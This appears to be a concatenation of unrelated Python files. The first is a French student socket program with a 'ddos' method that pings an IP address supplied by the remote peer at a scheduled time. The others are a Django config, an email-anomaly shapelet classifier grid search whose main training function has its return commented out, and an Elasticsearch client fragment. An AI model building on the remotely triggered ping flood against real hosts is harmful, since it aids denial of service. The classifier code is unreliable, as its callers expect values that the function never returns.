#crée la variable linesINT qui va juste transormer un str en int
linesInt = int(lines)
#si tu sais elisa ce que ça fait tu peut le mettre ?
start = nb_lines-1-linesInt
fin = str(fichier[start:])
connReseau.send(fin.encode("utf-8"))
def ddos(self, connReseau):
#définir le format de la date quand on la rentrera dans la variable
date = connReseau.recv(1024).decode("utf-8")
print(date)
format = "%Y-%m-%d %H:%M"
#on récupère la date et l'heure actuelle et on la formate comme voulu ci dessus
now = datetime.strftime(datetime.now(), format)
print(now)
#on compare la date et l'heure récupérées à celle souhaitée pour le ddos
if (now == date):
ip = connReseau.recv(1024).decode("utf-8")
print(ip)
#on envoie la requête, verbose permet d'afficher le ping, size gère sa taille et count le nombre de paquets
ping (ip, verbose=True, size=400, count=15)
print("ping okay")
else:
print("error")
adresseMachine = ("localhost", 60000)
carteReseauEcoute = modSocket.socket(modSocket.AF_INET, modSocket.SOCK_STREAM)
carteReseauConn = modSocket.socket(modSocket.AF_INET, modSocket.SOCK_STREAM)
donnee = ""
a = Action(donnee)
a.sendIP(carteReseauConn, adresseMachine)
|
from django.apps import AppConfig
class ConvergenceConfig(AppConfig):
name = 'convergence'
|
from Sloth.classify import Shapelets
from Sloth.preprocess import events_to_rates
import pandas as pd
import numpy as np
import os.path
#from evaluate import evaluate
#from preprocess import parse_weekly_timestamps
from manatee.evaluate import evaluate
from manatee.preprocess import parse_weekly_timestamps
import matplotlib.pyplot as plt
import pickle
from tslearn.preprocessing import TimeSeriesScalerMinMax
from sklearn.model_selection import StratifiedKFold
from sklearn.metrics import accuracy_score, f1_score
from keras.models import load_model
from keras.optimizers import Adam, Adagrad, RMSprop
def data_augmentation(X_train, y_train, random_seed = 0):
'''
augment samples of less frequent classes
so that all classes have same number of samples
random sampling with replacement
'''
values, counts = np.unique(y_train, return_counts = True)
max_samples = counts.max()
initial = X_train.shape[0]
for val in values:
ixs = np.where(y_train == val)[0]
np.random.seed(random_seed)
rand_ixs = np.random.choice(y_train[ixs].shape[0], max_samples - len(ixs), replace = True)
X_train = np.append(X_train, X_train[ixs][rand_ixs], axis = 0)
y_train = np.append(y_train, y_train[ixs][rand_ixs], axis = 0)
print("Augmented class {} with {} randomly sampled repetitions (with replacement)".format(val, max_samples - len(ixs)))
print("\nBefore augmentation the training dataset had {} samples".format(initial))
print("After augmentation the training dataset has {} samples".format(X_train.shape[0]))
return X_train, y_train
def data_augmentation_with_noise():
'''
augment samples of less frequent classes (with noise)
so that all classes have same number of samples
'''
pass
def shapelet_sizes_grid_search(series_size = 240*60, num_bins = 300, n_folds = 5,
min_points = 5, filter_bandwidth = 2, density = True, epochs=100, length=[.025, .05], num_shapelet_lengths=[6,9,12],
num_shapelets = .2, learning_rate=.01, weight_regularizer = .01, random_state = 0):
'''
grid search over different shapelet dictionary options
from Grabocka paper
'''
acc = 0
f1_macro = 0
f1_weighted = 0
best_min_l_acc = None
best_num_l_acc = None
best_min_l_f1_macro = None
best_num_l_f1_macro = None
best_min_l_f1_weighted = None
best_num_l_f1_weighted = None
# create rate values if they don't already exist
dir_path = "kmeans/sz_{}_hr_bins_{}_min_pts_{}_filter_width_{}_density_{}".format(series_size / 60 / 60, num_bins, min_points, filter_bandwidth, density)
series_values = np.load("rate_values/" + dir_path + "/series_values.npy")
labels = np.load("rate_values/" + dir_path + "/labels.npy")
# randomly shuffle before splitting into training / test / val
np.random.seed(random_state)
randomize = np.arange(len(series_values))
np.random.shuffle(randomize)
series_values = series_values[randomize]
labels = labels[randomize]
train_split = int(0.9 * series_values.shape[0])
# write HP combination results to file
file = open('hp_shp_sizes_grid_search_results.txt', 'a+')
file.write('%s,%s,%s,%s,%s\n' % ('Min Length', 'Num Shapelet Lengths', 'Accuracy', 'F1 Macro', 'F1 Weighted'))
file.close()
for min_length in length:
for num_lengths in num_shapelet_lengths:
# CV
skf = StratifiedKFold(n_splits= n_folds, shuffle = True)
val_acc = []
val_f1_macro = []
val_fl_weighted = []
print("Evaluating {} shapelet lengths starting at a minimum length of {}".format(num_lengths, min_length))
for i, (train, val) in enumerate(skf.split(series_values[:train_split], labels[:train_split])):
print("Running fold {} of {}".format(i+1, n_folds))
acc_val, f1_macro_val, f1_weighted_val = train_shapelets(series_values[train].reshape(-1, series_values.shape[1], 1), labels[train],
series_size = series_size, num_bins = num_bins, density=density, length = min_length, num_shapelet_lengths=num_lengths,
val_data=(series_values[val].reshape(-1, series_values.shape[1], 1), labels[val]))
val_acc.append(acc_val)
val_f1_macro.append(f1_macro_val)
val_fl_weighted.append(f1_weighted_val)
# write mean values
file = open('hp_shp_sizes_grid_search_results.txt', 'a+')
file.write('%s,%s,%s,%s,%s\n' % (min_length, num_lengths, np.mean(val_acc),
np.mean(val_f1_macro), np.mean(val_fl_weighted)))
file.close()
if np.mean(val_acc) > acc:
best_min_l_acc = min_length
best_num_l_acc = num_lengths
acc = np.mean(val_acc)
if np.mean(val_f1_macro) > f1_macro:
best_min_l_f1_macro = min_length
best_num_l_f1_macro = num_lengths
f1_macro = np.mean(val_f1_macro)
if np.mean(val_fl_weighted) > f1_weighted:
best_min_l_f1_weighted = min_length
best_num_l_f1_weighted = num_lengths
f1_weighted = np.mean(val_fl_weighted)
# return best result
print("The best accuracy was {} at min length {} and number of lengths {}".format(acc, best_min_l_acc, best_num_l_acc))
print("The best f1 macro was {} at min length {} and number of lengths {}".format(f1_macro, best_min_l_f1_macro, best_num_l_acc))
print("The best f1 weighted was {} at min length {} and number of lengths {}".format(f1_weighted, best_min_l_f1_weighted, best_num_l_f1_weighted))
def batch_events_to_rates(data, index, labels_dict = None, series_size = 60*60, min_points = 10, num_bins = 60, filter_bandwidth = 1, density=True):
'''
convert list of event times into rate functions using a gaussian filter.
parameters:
data pandas Series containing event times to convert
index index containing labels of different clusters to turn into
unique rate functions
labels_dict dictionary of labels (1 per index) to apply to labels
series_size length of windows that time series capture, expressed in seconds (default = 24 hours)
min_points minimum number of points needed to calculate rate function over series of length
series_size
num_bins number of bins to subdivide series into
filter_bandwidth length of gaussian filter
density whether to generate density rate functions
return:
series_values np array containing series values for each series
series_times np array containing time values for each point in each series
labels np array containing labels for each series
val_series_count dictionary containing the number of series parsed for each unique value
'''
# assert that data and index have the same length
try:
assert(len(data) == len(index))
except:
raise ValueError("The series of event times and the series of indices must be the same length")
# convert each cluster of time series to rates
series_values = []
series_times = []
labels = []
series_count = 0
val_series_count = {}
avg_event_count = {}
for val in index.unique():
val_series_count[val] = 0
avg_event_count[val] = 0
event_times = data.loc[index == val]
# iterate through event times by series size -> only convert to rate function if >= min_points events
event_index = 0
while (event_index <= event_times.max()):
events = event_times[(event_index <= event_times) & (event_times < (event_index + series_size))]
if len(events) >= min_points:
rate_vals, rate_times = events_to_rates(events.values.astype(int), num_bins = num_bins, filter_bandwidth = filter_bandwidth,
min_time = event_index, max_time = event_index + series_size, density = density)
series_values.append(rate_vals)
series_times.append(rate_times)
if labels_dict is not None:
labels.append(labels_dict[val])
series_count += 1
val_series_count[val] += 1
print("Added time series with {} events from cluster {}".format(len(events), val))
else:
print("Time series from cluster {} is too short".format(val))
event_index += series_size
avg_event_count[val] += len(events)
print("{} time series were added from cluster: {}".format(val_series_count[val], val))
if val_series_count[val]:
print("Time series were added from cluster: {} have an average of {} ecents".format(val, avg_event_count[val] / val_series_count[val]))
print("\nDataset Summary: \n{} total time series, length = {} hr, sampled {} times".format(series_count, series_size / 60 / 60, num_bins))
for val in index.unique():
ct = val_series_count[val]
print("{} time series ({} %) were added from cluster: {}".format(ct, round(ct / series_count * 100, 1), val))
if val_series_count[val]:
print("Time series were added from cluster: {} have an average of {} ecents".format(val, avg_event_count[val] / val_series_count[val]))
labels = np.array(labels)
series_values = np.vstack(series_values)
series_times = np.vstack(series_times)
# save series values and series times if they don't already exist
dir_path = "rate_values/kmeans/sz_{}_hr_bins_{}_min_pts_{}_filter_width_{}_density_{}".format(series_size / 60 / 60, num_bins, min_points, filter_bandwidth, density)
if not os.path.isfile(dir_path + "/series_values.npy"):
os.mkdir(dir_path)
np.save(dir_path + "/series_values.npy", series_values)
np.save(dir_path + "/series_times.npy", series_times)
np.save(dir_path + "/labels.npy", labels)
output = open(dir_path + "/val_series_count.pkl", 'wb')
pickle.dump(val_series_count, output)
output.close()
if len(labels_dict.keys()) > 2:
if not os.path.isfile(dir_path + "/labels_multi.npy"):
np.save(dir_path + "/labels_multi.npy", labels)
else:
if not os.path.isfile(dir_path + "/labels_binary.npy"):
np.save(dir_path + "/labels_binary.npy", labels)
return series_values, series_times, labels, val_series_count
def train_shapelets(X_train, y_train, visualize = False, epochs = 10000, length = 0.05, num_shapelet_lengths = 12,
num_shapelets = .25, learning_rate = .01, weight_regularizer = .001, batch_size = 256, optimizer = Adam, series_size = 240 * 60,
num_bins = 300, density = True, p_threshold = 0.5, transfer = False, val_data = None):
# shapelet classifier
source_dir = 'shapelets_bad'
clf = Shapelets(epochs, length, num_shapelet_lengths, num_shapelets, learning_rate, weight_regularizer,
batch_size = batch_size, optimizer = optimizer)
# visualize training data
if visualize:
for label in np.unique(y_train):
for index in np.where(y_train == label)[0][:2]:
plt.plot(np.arange(X_train.shape[1]), X_train[index])
time_unit = series_size / num_bins / 60
if time_unit == 1:
plt.xlabel('Minute of the Hour')
elif time_unit == 0.5:
plt.xlabel('Half Minute of the Hour')
if density:
plt.ylabel('Email Density')
else:
plt.ylabel('Emails per Minute')
if label == 1:
plt.title('Example of Anomalous Rate Function')
else:
plt.title('Example of Non-Anomalous Rate Function')
plt.show()
# split into training and validation sets
if val_data is None:
#np.random.seed(0)
inds = np.arange(X_train.shape[0])
np.random.shuffle(inds)
X_train = X_train[inds]
y_train = y_train[inds]
val_split = 1 / 3
val_split = int(val_split * X_train.shape[0])
X_train, y_train = X_train[:-val_split], y_train[:-val_split]
X_val, y_val = (X_train[-val_split:], y_train[-val_split:])
else:
X_val, y_val = val_data
# data augmentation
X_train, y_train = data_augmentation(X_train, y_train)
# eval shapelet on best fit
# shapelet classifier
if not transfer:
print("\nFitting Shapelet Classifier on {} Training Time Series".format(X_train.shape[0]))
clf.load_model(num_bins, y_train, "checkpoints/shapelets_bad2019-03-22_19-39-26_45-0.2369.h5")
#clf.fit(X_train, y_train, source_dir = source_dir, val_data = (X_val, y_val))
else:
print("\nFitting Shapelet Classifer on {} Training Time Series. Transfer Learned from Binary Setting".format(X_train.shape[0]))
model = clf.fit_transfer_model(X_train, y_train, "checkpoints/shapelets2019-03-08_01-19-31_61-0.4997.h5", source_dir = source_dir, val_data = (X_val, y_val))
# evaluate after full training
y_pred = clf.predict_proba(X_val)
y_preds, conf = clf.decode(y_pred, p_threshold)
print('\nEvaluation on Randomly Shuffled Validation Set with {} Validation Time Series'.format(X_val.shape[0]))
#targets = clf.get_classes()
evaluate(y_val, y_preds)#, target_names=targets)
#return accuracy_score(y_val, y_preds), f1_score(y_val, y_preds, average='macro'), f1_score(y_val, y_preds, average='weighted')
# visualize
if visualize:
print('Visualize Shapelet Classifications')
rates = X_train[-val_split:]
y_true = y_train[-val_split:]
for i in np.arange(3):
if y_true[i] == 1 and y_preds[i] == 1:
print('Correct Classification: Anomalous')
elif y_true[i] == 1 and y_preds[i] == 0:
print('Incorrect Classification: True = Anomalous, Predicted = Non-Anomalous')
elif y_true[i] == 0 and y_preds[i] == 1:
print('Incorrect Classification: True = Non-Anomalous, Predicted = Anomalous')
elif y_true[i] == 0 and y_preds[i] == 0:
print('Correct Classification: Non-Anomalous')
clf.VisualizeShapeletLocations(rates, i)
""" # Shapelet test - track over time
track = np.array([])
for i in range(10):
track = np.append(track, i * 0.01)
track = np.append(track, track[::-1])
# Beginning
track_beg = np.pad(track, (0, num_bins - len(track)), 'constant')
track_beg = track_beg.reshape(1, track_beg.shape[0], 1)
track_pred = clf.predict(track_beg)
if track_pred:
print('Classification: Anomalous')
else:
print('Classification: Non-Anomalous')
clf.VisualizeShapeletLocations(track_beg, 0, series_size, num_bins, density)
# Middle
l = int((num_bins - len(track)) / 2)
track_mid = np.pad(track, (l, l), 'constant')
track_mid = track_mid.reshape(1, track_mid.shape[0], 1)
track_pred = clf.predict(track_mid)
if track_pred:
print('Classification: Anomalous')
else:
print('Classification: Non-Anomalous')
clf.VisualizeShapeletLocations(track_mid, 0, series_size, num_bins, density)
# End
track_end = np.pad(track, (num_bins - len(track), 0), 'constant')
track_end = track_end.reshape(1, track_end.shape[0], 1)
track_pred = clf.predict(track_end)
if track_pred:
print('Classification: Anomalous')
else:
print('Classification: Non-Anomalous')
clf.VisualizeShapeletLocations(track_end, 0, series_size, num_bins, density) """
# hyperparameter optimization
# shapelet sizes grid search
# epoch optimization with best HPs and shapelet sizes
def shapelets_hp_opt(length = .05, num_shapelet_lengths = 12, series_size = 240 * 60, n_folds = 3,
num_bins = 300, min_points = 5, filter_bandwidth =2, density = True, num_shp = .25, lr = [.001, .01, .1],
wr = .001, b = 256, opt = Adam , epochs = 1000, random_state = 0):
'''
grid search over different hyperparameter options (learning rate, weight regularizer, batch size, num_shapelets,
optimizer) from Grabocka paper
num_shapelets = [.05,.1,.15,.2,.25]
learning_rate = [.001, .01, .1],
weight_regularizer = [.001,.01, .1],
batch_size = [64, 128, 256, 512],
optimizer = ['Adam', 'Adagrad', 'RMSprop']
'''
acc = 0
f1_macro = 0
f1_weighted = 0
best_val_acc = None
best_val_f1_macro = None
best_val_f1_weighted = None
# load rate values
dir_path = "kmeans/sz_{}_hr_bins_{}_min_pts_{}_filter_width_{}_density_{}".format(series_size / 60 / 60, num_bins, min_points, filter_bandwidth, density)
series_values = np.load("rate_values/" + dir_path + "/series_values.npy")
labels = np.load("rate_values/" + dir_path + "/labels.npy")
# randomly shuffle before splitting into training / test / val
np.random.seed(random_state)
randomize = np.arange(len(series_values))
np.random.shuffle(randomize)
series_values = series_values[randomize]
labels = labels[randomize]
train_split = int(0.9 * series_values.shape[0])
# write HP combination results to file
'''
file = open('hp_grid_search_results.txt', 'a+')
file.write('%s,%s,%s,%s,%s,%s,%s,%s\n' % ('Num Shapelets', 'Learning Rate', 'Weight Regularizer',
'Optimizer', 'Batch Size', 'Accuracy', 'F1 Macro', 'F1 Weighted'))
file.close()
'''
for value in lr:
# CV
skf = StratifiedKFold(n_splits= n_folds, shuffle = True)
val_acc = []
val_f1_macro = []
val_fl_weighted = []
print("Evaluating num_shp: {}, lr: {}, wr: {}, opt: {}, bs: {}".format(num_shp, value, wr, opt, b))
for i, (train, val) in enumerate(skf.split(series_values[:train_split], labels[:train_split])):
print("Running fold {} of {}".format(i+1, n_folds))
acc_val, f1_macro_val, f1_weighted_val = train_shapelets(series_values[train].reshape(-1, series_values.shape[1], 1), labels[train],
series_size = series_size, num_bins = num_bins, density=density, length = length, num_shapelet_lengths=num_shapelet_lengths,
val_data=(series_values[val].reshape(-1, series_values.shape[1], 1), labels[val]), learning_rate = value,
weight_regularizer = wr, num_shapelets = num_shp, optimizer = opt, batch_size = b, epochs=epochs)
val_acc.append(acc_val)
val_f1_macro.append(f1_macro_val)
val_fl_weighted.append(f1_weighted_val)
# write mean values
file = open('hp_grid_search_results.txt', 'a+')
file.write('%s,%s,%s,%s,%s,%s,%s,%s\n' % (num_shp, value, wr, opt, b, np.mean(val_acc),
np.mean(val_f1_macro), np.mean(val_fl_weighted)))
file.close()
if np.mean(val_acc) > acc:
best_val_acc = value
acc = np.mean(val_acc)
if np.mean(val_f1_macro) > f1_macro:
best_val_f1_macro = value
f1_macro = np.mean(val_f1_macro)
if np.mean(val_fl_weighted) > f1_weighted:
best_val_f1_weighted = value
f1_weighted = np.mean(val_fl_weighted)
# return best result
print("The best accuracy was {} at value {}".format(acc, best_val_acc))
print("The best f1 macro was {} at value {}".format(f1_macro, best_val_f1_macro))
print("The best f1 weighted was {} at value {}".format(f1_weighted, best_val_f1_weighted))
def series_size_cv_grid_search(event_times, index, n_folds =5, min = 15 * 60, max = 120*60, step = 15*60, num_bins = 60,
min_points = 10, filter_bandwidth = 1, density = True, epochs=100, length=0.1, num_shapelet_lengths=2,
num_shapelets = .2, learning_rate=.01, weight_regularizer = .01):
'''
grid search over different series size values with 5 fold cross validation. graph results
30 minute series size provides best accuracy, f1, support across classes
'''
# shapelet classifier
#clf = Shapelets(epochs, length, num_shapelet_lengths, num_shapelets, learning_rate, weight_regularizer)
acc = []
f1_macro = []
f1_weighted = []
for x in range(min, max, step):
# create rate values if they don't already exist
if os.path.isfile("rate_values/kmeans/sz_{}_hr_bins_{}_min_pts_{}_filter_width_{}_density_{}/series_values.npy".format(x / 60 / 60, num_bins, min_points, filter_bandwidth, density)):
dir_path = "kmeans/sz_{}_hr_bins_{}_min_pts_{}_filter_width_{}_density_{}".format(x / 60 / 60, num_bins, min_points, filter_bandwidth, density)
series_values = np.load("rate_values/" + dir_path + "/series_values.npy")
labels = np.load("rate_values/" + dir_path + "/labels.npy")
else:
labels_dict = {}
for val in index.unique():
if val < 50:
labels_dict[val] = 0
else:
labels_dict[val] = 1
series_values, _, labels, _ = \
batch_events_to_rates(event_times, index, labels_dict, series_size = x, min_points = min_points,
num_bins = num_bins, filter_bandwidth = filter_bandwidth, density = density)
skf = StratifiedKFold(n_splits= n_folds, shuffle = True)
val_acc = []
val_f1_macro = []
val_fl_weighted = []
# randomly shuffle before splitting into training / test / val
np.random.seed(0)
randomize = np.arange(len(series_values))
np.random.shuffle(randomize)
series_values = series_values[randomize]
labels = labels[randomize]
# train
train_split = int(0.9 * series_values.shape[0])
print("Evaluating series size {}".format(x))
for i, (train, val) in enumerate(skf.split(series_values[:train_split], labels[:train_split])):
print("Running fold {} of {}".format(i+1, n_folds))
acc_val, f1_macro_val, f1_weighted_val = train_shapelets(series_values[train].reshape(-1, series_values.shape[1], 1), labels[train],
series_size = x, num_bins = num_bins, density=density,
val_data=(series_values[val].reshape(-1, series_values.shape[1], 1), labels[val]))
val_acc.append(acc_val)
val_f1_macro.append(f1_macro_val)
val_fl_weighted.append(f1_weighted_val)
acc.append(np.mean(val_acc))
f1_macro.append(np.mean(val_f1_macro))
f1_weighted.append(np.mean(val_fl_weighted))
# graph results
names = ['Accuracy', 'F1 Macro', 'F1 Weighted']
for vals, name in zip([acc, f1_macro, f1_weighted], names):
plt.clf()
plt.plot(range(min, max, step), vals)
plt.title(name)
plt.xlabel('Series Size')
plt.ylabel(name)
plt.show()
# return best result
x_vals = np.arange(min, max, step)
print("The best accuracy was {} at series size {}".format(np.amax(acc), x_vals[np.argmax(acc)]))
print("The best f1 macro was {} at series size {}".format(np.amax(f1_macro), x_vals[np.argmax(f1_macro)]))
print("The best f1 weighted was {} at series size {}".format(np.amax(f1_weighted), x_vals[np.argmax(f1_weighted)]))
return np.amax(acc), np.amax(f1_macro), np.amax(f1_weighted)
def num_bins_cv_grid_search(event_times, index, n_folds =5, min = 15, max = 61, step = 15, series_size = 30 * 60,
min_points = 10, filter_bandwidth = 1, density = True, epochs=100, length=0.1, num_shapelet_lengths=2,
num_shapelets = .2, learning_rate=.01, weight_regularizer = .01):
'''
grid search over different series size values with 5 fold cross validation. graph results
135 bins provides best accuracy, f1, support across classes
'''
# shapelet classifier
#clf = Shapelets(epochs, length, num_shapelet_lengths, num_shapelets, learning_rate, weight_regularizer)
acc = []
f1_macro = []
f1_weighted = []
for x in range(min, max, step):
# create rate values if they don't already exist
if os.path.isfile("rate_values/kmeans/sz_{}_hr_bins_{}_min_pts_{}_filter_width_{}_density_{}/series_values.npy".format(series_size / 60 / 60, x, min_points, filter_bandwidth, density)):
dir_path = "kmeans/sz_{}_hr_bins_{}_min_pts_{}_filter_width_{}_density_{}".format(series_size / 60 / 60, x, min_points, filter_bandwidth, density)
series_values = np.load("rate_values/" + dir_path + "/series_values.npy")
labels = np.load("rate_values/" + dir_path + "/labels.npy")
else:
labels_dict = {}
for val in index.unique():
if val < 50:
labels_dict[val] = 0
else:
labels_dict[val] = 1
series_values, _, labels, _ = \
batch_events_to_rates(event_times, index, labels_dict, series_size = series_size, min_points = min_points,
num_bins = x, filter_bandwidth = filter_bandwidth, density = density)
skf = StratifiedKFold(n_splits= n_folds, shuffle = True)
val_acc = []
val_f1_macro = []
val_fl_weighted = []
# randomly shuffle before splitting into training / test / val
np.random.seed(0)
randomize = np.arange(len(series_values))
np.random.shuffle(randomize)
series_values = series_values[randomize]
labels = labels[randomize]
# train
train_split = int(0.9 * series_values.shape[0])
print("Evaluating number of bins {}".format(x))
for i, (train, val) in enumerate(skf.split(series_values[:train_split], labels[:train_split])):
print("Running fold {} of {}".format(i+1, n_folds))
acc_val, f1_macro_val, f1_weighted_val = train_shapelets(series_values[train].reshape(-1, series_values.shape[1], 1), labels[train],
series_size = series_size, num_bins = x, density=density,
val_data=(series_values[val].reshape(-1, series_values.shape[1], 1), labels[val]))
val_acc.append(acc_val)
val_f1_macro.append(f1_macro_val)
val_fl_weighted.append(f1_weighted_val)
acc.append(np.mean(val_acc))
f1_macro.append(np.mean(val_f1_macro))
f1_weighted.append(np.mean(val_fl_weighted))
# graph results
names = ['Accuracy', 'F1 Macro', 'F1 Weighted']
for vals, name in zip([acc, f1_macro, f1_weighted], names):
plt.clf()
plt.plot(range(min, max, step), vals)
plt.title(name)
plt.xlabel('Number of Bins')
plt.ylabel(name)
plt.show()
# return best result
x_vals = np.arange(min, max, step)
print("The best accuracy was {} at number of bins {}".format(np.amax(acc), x_vals[np.argmax(acc)]))
print("The best f1 macro was {} at number of bins {}".format(np.amax(f1_macro), x_vals[np.argmax(f1_macro)]))
print("The best f1 weighted was {} at number of bins {}".format(np.amax(f1_weighted), x_vals[np.argmax(f1_weighted)]))
return np.amax(acc), np.amax(f1_macro), np.amax(f1_weighted)
def filter_width_cv_grid_search(event_times, index, n_folds =5, min = 1, max = 5, step = 1, series_size = 30 * 60,
min_points = 10, num_bins = 135, density = True, epochs=100, length=0.1, num_shapelet_lengths=2,
num_shapelets = .2, learning_rate=.01, weight_regularizer = .01):
'''
grid search over different series size values with 5 fold cross validation. graph results
width = 1 provides best accuracy, f1, support across classes
'''
# shapelet classifier
#clf = Shapelets(epochs, length, num_shapelet_lengths, num_shapelets, learning_rate, weight_regularizer)
acc = []
f1_macro = []
f1_weighted = []
for x in range(min, max, step):
# create rate values if they don't already exist
if os.path.isfile("rate_values/kmeans/sz_{}_hr_bins_{}_min_pts_{}_filter_width_{}_density_{}/series_values.npy".format(series_size / 60 / 60, num_bins, min_points, x, density)):
dir_path = "kmeans/sz_{}_hr_bins_{}_min_pts_{}_filter_width_{}_density_{}".format(series_size / 60 / 60, num_bins, min_points, x, density)
series_values = np.load("rate_values/" + dir_path + "/series_values.npy")
labels = np.load("rate_values/" + dir_path + "/labels.npy")
else:
labels_dict = {}
for val in index.unique():
if val < 50:
labels_dict[val] = 0
else:
labels_dict[val] = 1
series_values, _, labels, _ = \
batch_events_to_rates(event_times, index, labels_dict, series_size = series_size, min_points = min_points,
num_bins = num_bins, filter_bandwidth = x, density = density)
skf = StratifiedKFold(n_splits= n_folds, shuffle = True)
val_acc = []
val_f1_macro = []
val_fl_weighted = []
# randomly shuffle before splitting into training / test / val
np.random.seed(0)
randomize = np.arange(len(series_values))
np.random.shuffle(randomize)
series_values = series_values[randomize]
labels = labels[randomize]
# train
train_split = int(0.9 * series_values.shape[0])
print("Evaluating filter bandwidth {}".format(x))
for i, (train, val) in enumerate(skf.split(series_values[:train_split], labels[:train_split])):
print("Running fold {} of {}".format(i+1, n_folds))
acc_val, f1_macro_val, f1_weighted_val = train_shapelets(series_values[train].reshape(-1, series_values.shape[1], 1), labels[train],
series_size = series_size, num_bins = num_bins, density=density,
val_data=(series_values[val].reshape(-1, series_values.shape[1], 1), labels[val]))
val_acc.append(acc_val)
val_f1_macro.append(f1_macro_val)
val_fl_weighted.append(f1_weighted_val)
acc.append(np.mean(val_acc))
f1_macro.append(np.mean(val_f1_macro))
f1_weighted.append(np.mean(val_fl_weighted))
# graph results
names = ['Accuracy', 'F1 Macro', 'F1 Weighted']
for vals, name in zip([acc, f1_macro, f1_weighted], names):
plt.clf()
plt.plot(range(min, max, step), vals)
plt.title(name)
plt.xlabel('Filter Bandwidth')
plt.ylabel(name)
plt.show()
# return best result
x_vals = np.arange(min, max, step)
print("The best accuracy was {} at filter bandwidth {}".format(np.amax(acc), x_vals[np.argmax(acc)]))
print("The best f1 macro was {} at filter bandwidth {}".format(np.amax(f1_macro), x_vals[np.argmax(f1_macro)]))
print("The best f1 weighted was {} at filter bandwidth {}".format(np.amax(f1_weighted), x_vals[np.argmax(f1_weighted)]))
return np.amax(acc), np.amax(f1_macro), np.amax(f1_weighted)
def min_points_cv_grid_search(event_times, index, n_folds =5, min = 5, max = 26, step = 5, series_size = 30 * 60,
filter_bandwidth = 1, num_bins = 135, density = True, epochs=100, length=0.1, num_shapelet_lengths=2,
num_shapelets = .2, learning_rate=.01, weight_regularizer = .01):
'''
grid search over different series size values with 5 fold cross validation. graph results
5 bins (10 bins might be more faithful representation) provides best accuracy, f1, support across classes
'''
# shapelet classifier
#clf = Shapelets(epochs, length, num_shapelet_lengths, num_shapelets, learning_rate, weight_regularizer)
acc = []
f1_macro = []
f1_weighted = []
for x in range(min, max, step):
# create rate values if they don't already exist
if os.path.isfile("rate_values/kmeans/sz_{}_hr_bins_{}_min_pts_{}_filter_width_{}_density_{}/series_values.npy".format(series_size / 60 / 60, num_bins, x, filter_bandwidth, density)):
dir_path = "kmeans/sz_{}_hr_bins_{}_min_pts_{}_filter_width_{}_density_{}".format(series_size / 60 / 60, num_bins, x, filter_bandwidth, density)
series_values = np.load("rate_values/" + dir_path + "/series_values.npy")
labels = np.load("rate_values/" + dir_path + "/labels.npy")
else:
labels_dict = {}
for val in index.unique():
if val < 50:
labels_dict[val] = 0
else:
labels_dict[val] = 1
series_values, _, labels, _ = \
batch_events_to_rates(event_times, index, labels_dict, series_size = series_size, min_points = x,
num_bins = num_bins, filter_bandwidth = filter_bandwidth, density = density)
skf = StratifiedKFold(n_splits= n_folds, shuffle = True)
val_acc = []
val_f1_macro = []
val_fl_weighted = []
# randomly shuffle before splitting into training / test / val
np.random.seed(0)
randomize = np.arange(len(series_values))
np.random.shuffle(randomize)
series_values = series_values[randomize]
labels = labels[randomize]
# train
train_split = int(0.9 * series_values.shape[0])
print("Evaluating minimum number of points {}".format(x))
for i, (train, val) in enumerate(skf.split(series_values[:train_split], labels[:train_split])):
print("Running fold {} of {}".format(i+1, n_folds))
acc_val, f1_macro_val, f1_weighted_val = train_shapelets(series_values[train].reshape(-1, series_values.shape[1], 1), labels[train],
series_size = series_size, num_bins = num_bins, density=density,
val_data=(series_values[val].reshape(-1, series_values.shape[1], 1), labels[val]))
val_acc.append(acc_val)
val_f1_macro.append(f1_macro_val)
val_fl_weighted.append(f1_weighted_val)
acc.append(np.mean(val_acc))
f1_macro.append(np.mean(val_f1_macro))
f1_weighted.append(np.mean(val_fl_weighted))
# graph results
names = ['Accuracy', 'F1 Macro', 'F1 Weighted']
for vals, name in zip([acc, f1_macro, f1_weighted], names):
plt.clf()
plt.plot(range(min, max, step), vals)
plt.title(name)
plt.xlabel('Min Points')
plt.ylabel(name)
plt.show()
# return best result
x_vals = np.arange(min, max, step)
print("The best accuracy was {} at minimum number of points {}".format(np.amax(acc), x_vals[np.argmax(acc)]))
print("The best f1 macro was {} at minimum number of points {}".format(np.amax(f1_macro), x_vals[np.argmax(f1_macro)]))
print("The best f1 weighted was {} at minimum number of points {}".format(np.amax(f1_weighted), x_vals[np.argmax(f1_weighted)]))
return np.amax(acc), np.amax(f1_macro), np.amax(f1_weighted)
# main method for training methods
if __name__ == '__main__':
series_size = 240 * 60
num_bins = 300
min_points = 5
filter_bandwidth = 2
density = True
data = pd.read_pickle('../../all_emails_kmeans_clustered.pkl')
data = parse_weekly_timestamps(data)
# 5 fold CV on series size
'''
num_bins_cv_grid_search(data['Weekly Timestamp'], data['kmeans'], min = 300, max = 421, step = 30,
series_size=series_size, min_points=min_points, filter_bandwidth=filter_bandwidth, density=density)
shapelet_sizes_grid_search(series_size=series_size, filter_bandwidth=filter_bandwidth,
num_bins=num_bins, density=density, min_points=min_points)
'''
shapelets_hp_opt()
'''
# EDA events / series
labels_dict = {}
for val in data['file'].unique():
if val == 'enron.jsonl':
labels_dict[val] = 0
else:
labels_dict[val] = 1
batch_events_to_rates(data['Weekly Timestamp'], data['file'], labels_dict, series_size = series_size, min_points = min_points,
num_bins = num_bins, filter_bandwidth = filter_bandwidth, density = density)
'''
|
# Licensed to Elasticsearch B.V under one or more agreements.
# Elasticsearch B.V licenses this file to you under the Apache 2.0 License.
# See the LICENSE file in the project root for more information
from .utils import NamespacedClient, query_params, SKIP_IN_PATH, _make_path
class AutoscalingClient(NamespacedClient):
@query_params()
async def get_autoscaling_decision(self, params=None, headers=None):
"""
Gets the current autoscaling decision based on the configured autoscaling
policy, indicating whether or not autoscaling is needed.
`<https://www.elastic.co/guide/en/elasticsearch/reference/current/autoscaling-get-autoscaling-decision.html>`_
"""
return await self.transport.perform_request(
"GET", "/_autoscaling/decision", params=params, headers=headers
)
@query_params()
async def delete_autoscaling_policy(self, name, params=None, headers=None):
"""
Deletes an autoscaling policy.
`<https://www.elastic.co/guide/en/elasticsearch/reference/current/autoscaling-delete-autoscaling-policy.html>`_
:arg name: the name of the autoscaling policy
"""
if name in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'name'.")
return await self.transport.perform_request(
"DELETE",
_make_path("_autoscaling", "policy", name),
params=params,
headers=headers,
)
@query_params()
async def put_autoscaling_policy(self, name, body, params=None, headers=None):
"""
Creates a new autoscaling policy.
`<https://www.elastic.co/guide/en/elasticsearch/reference/current/autoscaling-put-autoscaling-policy.html>`_
:arg name: the name of the autoscaling policy
:arg body: the specification of the autoscaling policy
"""
